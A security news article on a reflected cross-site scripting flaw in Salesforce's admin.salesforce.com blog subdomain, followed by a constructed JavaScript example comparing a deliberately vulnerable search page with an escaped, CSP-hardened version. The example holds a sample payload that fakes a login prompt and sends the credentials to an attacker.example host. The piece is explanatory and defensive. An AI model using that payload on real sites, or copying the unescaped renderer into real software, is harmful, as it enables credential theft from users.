Beginning in July and lasting for at least a month, a Salesforce subdomain used for blogging was affected by a reflected cross-site scripting (XSS) vulnerability that attackers could have exploited to distribute malware and carry out phishing attacks against Salesforce users.
In a Wednesday blog post, Aditya Sood, lead architect of Elastica Cloud Threat Labs, wrote that the vulnerability was in the “admin.salesforce.com” subdomain, and he told SCMagazine.com in a Thursday email correspondence that the bug was reported to Salesforce on July 6 and addressed on Aug. 9.
Although Salesforce told Elastica that it considered the vulnerability low impact because it did not affect the primary Salesforce domain, Sood said there is more to the issue and that these types of bugs “should not be taken lightly.”
In the post, he demonstrated how the flaw could have been exploited to stage convincing phishing attacks: script injected through the vulnerable parameter rendered a fake login pop-up window on the legitimate admin.salesforce.com page, putting usernames and passwords at risk. The theft of credentials is made worse because Salesforce, Sood said, has implemented single sign-on (SSO).
“The users primarily have only one set of credentials which is mainly Salesforce SSO,” Sood said. “So one can imagine that if those accounts are compromised then attackers could gain access to all the applications used by the Salesforce users.”
Sood said that the vulnerability could also enable distribution of malware via a drive-by attack, since script injected into a trusted page can silently redirect visitors or load content from an attacker-controlled site.
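To make the reflected-XSS mechanism behind both the phishing and the drive-by scenarios concrete, here is an added example written for this article. It is not Elastica's proof of concept and not Salesforce code; the blog search page, the `q` parameter and the payload are constructed for illustration. It shows a handler that reflects a search term straight into the page, the same handler with output escaping, and response headers that limit the damage if an escape is ever missed.

```javascript
// Constructed example: a reflected XSS in a hypothetical blog search page,
// shown beside a hardened version. Written for this article; not the
// Elastica proof of concept and not Salesforce code.

// Escape the five characters that let user input break out of HTML text
// or a double/single-quoted attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the value of ?q= is reflected into the response unchanged,
// so anything the attacker puts in a crafted link is rendered as markup.
function renderSearchVulnerable(q) {
  return `<h1>Results for ${q}</h1>`;
}

// Hardened: identical page, but the reflected value is HTML-escaped, so
// the browser shows the payload as text instead of executing it.
function renderSearchHardened(q) {
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// Defence in depth for the same page: a CSP without 'unsafe-inline'
// blocks injected inline script even if an escape is missed, and
// frame-ancestors stops the page being embedded in an attacker overlay.
function hardenedHeaders() {
  return {
    "Content-Type": "text/html; charset=utf-8",
    "Content-Security-Policy":
      "default-src 'self'; script-src 'self'; object-src 'none'; " +
      "base-uri 'none'; frame-ancestors 'none'",
    "X-Content-Type-Options": "nosniff",
  };
}

// Crude check used below: does the rendered HTML contain a script element
// or an inline event handler? Real scanners do far more; this only shows
// the difference between the two renderers on the same input.
function containsInjectedMarkup(html) {
  return /<script\b|\bon\w+\s*=/i.test(html);
}

// Constructed payload in the shape the article describes: a script that
// pops a fake "session expired" login prompt and leaks the answers to an
// attacker host. The host is a placeholder and nothing is sent here.
const FAKE_LOGIN_PAYLOAD =
  "<script>" +
  'var u=prompt("Session expired. Username:");' +
  'var p=prompt("Password:");' +
  'new Image().src="https://attacker.example/c?u="+encodeURIComponent(u)' +
  '+"&p="+encodeURIComponent(p);' +
  "</script>";

// Render the payload through both versions and report what each produces.
function demo() {
  const vulnerable = renderSearchVulnerable(FAKE_LOGIN_PAYLOAD);
  const hardened = renderSearchHardened(FAKE_LOGIN_PAYLOAD);
  return {
    vulnerableExecutes: containsInjectedMarkup(vulnerable), // true
    hardenedExecutes: containsInjectedMarkup(hardened),     // false
    hardenedHtml: hardened,
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The attacker never touches the server in this pattern: the victim follows a link such as `/blog/search?q=<payload>` on the trusted domain, and the page echoes the payload back. Escaping at the point of output is the fix; the CSP and framing headers are there so a single missed escape does not again hand an attacker the origin's full trust, which with SSO in play is the whole point of the attack.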